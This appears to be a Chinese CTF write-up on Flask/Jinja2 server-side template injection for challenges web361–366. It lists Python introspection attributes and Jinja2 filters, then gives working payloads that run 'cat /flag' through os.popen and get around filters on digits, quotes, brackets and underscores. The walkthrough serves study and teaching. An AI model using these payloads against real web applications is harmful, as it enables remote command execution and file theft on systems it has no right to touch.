ssti注入

Posted kode00

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ssti注入相关的知识,希望对你有一定的参考价值。

笔记:

__class__            类的一个内置属性,表示实例对象的类。
 
__base__             类型对象的直接基类
 
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
 
__mro__              method resolution order,即解析方法调用的顺序;此属性是由类组成的元            组,在方法解析期间会基于它来查找基类。
 
__subclasses__()     返回这个类的子类集合,每个类都保留一个对其直接子类的弱引用列表。该方法返回一个列表,其中包含所有仍然存在的引用。列表按照定义顺序排列。
 
__init__             初始化类,返回的类型是function
 
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
 
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
 
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
 
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a[\'b\'],就是a.__getitem__(\'b\')
 
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
 
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__(\'os\').popen(\'ls\').read()]
 
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
 
url_for              flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__[\'__builtins__\']含有current_app。
 
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__[\'__builtins__\']含有current_app。
 
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:lipsum.__globals__[\'os\'].popen(\'ls\').read()
 
current_app          应用上下文,一个全局变量。
 
request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__[\'__builtins__\'].open(\'/proc\\self\\fd/3\').read()
 
request.args.x1        get传参
 
request.values.x1      所有参数
 
request.cookies      cookies参数
 
request.headers      请求头参数
 
request.form.x1        post传参    (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
 
request.data           post传参    (Content-Type:a/b)
 
request.json         post传json  (Content-Type: application/json)
 
config               当前application的所有配置。此外,也可以这样 config.__class__.__init__.__globals__[\'os\'].popen(\'ls\').read() 
 
g                    g得到<flask.g of \'flask_ssti\'>

常用的过滤器:

int():将值转换为int类型;
 
float():将值转换为float类型;
 
lower():将字符串转换为小写;
 
upper():将字符串转换为大写;
 
title():把值中的每个单词的首字母都转成大写;
 
capitalize():把变量值的首字母转成大写,其余字母转小写;
 
trim():截取字符串前面和后面的空白字符;
 
wordcount():计算一个长字符串中单词的个数;
 
reverse():字符串反转;
 
replace(value,old,new): 替换将old替换为new的字符串;
 
truncate(value,length=255,killwords=False):截取length长度的字符串;
 
striptags():删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格;
 
escape()或e:转义字符,会将<、>等符号转义成HTML中的符号。显例:content|escape或content|e。
 
safe(): 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: \'<em>hello</em>\'|safe;
 
list():将变量列成列表;
 
string():将变量转换成字符串;
 
join():将一个序列中的参数值拼接成字符串。示例看上面payload;
 
abs():返回一个数值的绝对值;
 
first():返回一个序列的第一个元素;
 
last():返回一个序列的最后一个元素;
 
format(value,arags,*kwargs):格式化字符串。比如: "%s" - "%s"|format(\'Hello?\',"Foo!") 将输出:Helloo? - Foo!
 
length():返回一个序列或者字典的长度;
 
sum():返回列表内数值的和;
 
sort():返回排序后的列表;
 
default(value,default_value,boolean=false):如果当前变量没有值,则会使用参数中的值来代替。示例:name|default(\'xiaotuo\')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。
 
length()返回字符串的长度,别名是count

 

web361

思路其实很简单,首先得到空字符串的类,用.__class__就可以得到空字符串类。

 

 得到了空字符串类之后,我们就需要去找基类,这里我们使用__base__来找,当然也可以用__bases__来找全部基类,这道题刚好他的基类就是object,所以直接通过__base__来找。

 

 找到基类后我们就查看基类下的所以类,这里用到__subclasses__()进行查看,我们找到os._wrap_close这个类并且使用这个类中的popen方法。(我们通过[]的下标索引来找到这个类)

 

 

 

 接着我们初始化这个类。

 

 

然后再找这个类中的所有变量和方法。

 然后我们就可以通过popen方法来读取flag文件

 

payload:\'\'.__class__.__base__.__subclasses__()[132].__init__.__globals__[\'popen\'](\'cat /flag\').read()

web362

对于数字2,3进行了过滤

绕过方式一、使用全半角数字进行绕过:(切换的中文输入法里面进行全半角切换)

payload:?name=\'\'.__class__.__base__.__subclasses__()[132].__init__.__globals__[\'popen\'](\'cat /flag\').read()

绕过方法二、使用__builtins__

 

python2和python3两个版本通用的方法
__builtins__代码执行
__builtins__ 内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。
在启动Python解释器后,就可以直接使用一些函数.
这些函数称为内建函数,在__builtins__模块中,Python在启动时就直接为我们导入了。准确的说,Python在启动时会首先加载内建名称空间,内建名称空间中有许多名字到对象之间的映射,这些名字就是内建函数的名称,对象就是这些内建函数对象。可以使用dir(builtins)来查看调用方法的列表,然后可以发现__builtins__下有eval,__import__等的函数,因此可以利用此来执行命令。

 

payload:?name=x.__init__.__globals__[\'__builtins__\'][\'eval\']("__import__(\'os\').popen(\'cat /flag\').read()")

 web 363

对于单双引号进行了过滤:

使用request进行绕过

 

payload:?name=x.__init__.__globals__[request.args.x1].eval(request.args.x2)&x1=__builtins__&x2=__import__(\'os\').popen(\'cat /flag\').read()

 

web 364

过滤引号和args,这里用cookie传参绕过:

 

payload:?name=url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()

cookie传参:a=os;b=popen;c=cat /flag

或者

payload:?name=x.__init__.__globals__[request.cookies.a].eval(request.cookies.b)

cookie传参:a=__builtins__;b=__import__("os").popen("cat /flag").read()

 

web 365

过滤了引号,还有中括号,但request.cookies仍然可以用

 

?name=url_for.__globals__.os.popen(request.cookies.a).read()

cookie传参:a=cat /flag

web 366

过滤了下划线。用内置方法lipsum绕过,

payload:?name=(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()

cookie传参:a=__globals__;b=cat /flag

 

attr用于获取变量:常见于点号(.)被过滤,或者点号(.)和中括号([])都被过滤的情况。

 

""|attr("__class__")
相当于
"".__class__

 

SSTI模板注入

https://www.kingkk.com/2018/06/Flask-Jinja2-SSTI-python-沙箱逃逸/
https://www.freebuf.com/column/187845.html

以上是关于ssti注入的主要内容,如果未能解决你的问题,请参考以下文章

详解SSTI模板注入

BugKu:Simple_SSTI(SSTI模板注入)

关于SSTI的坑

SSTI模板注入

flask之ssti模版注入从零到入门

ssti注入(服务器模板注入) && BJDCTF 2nd fake google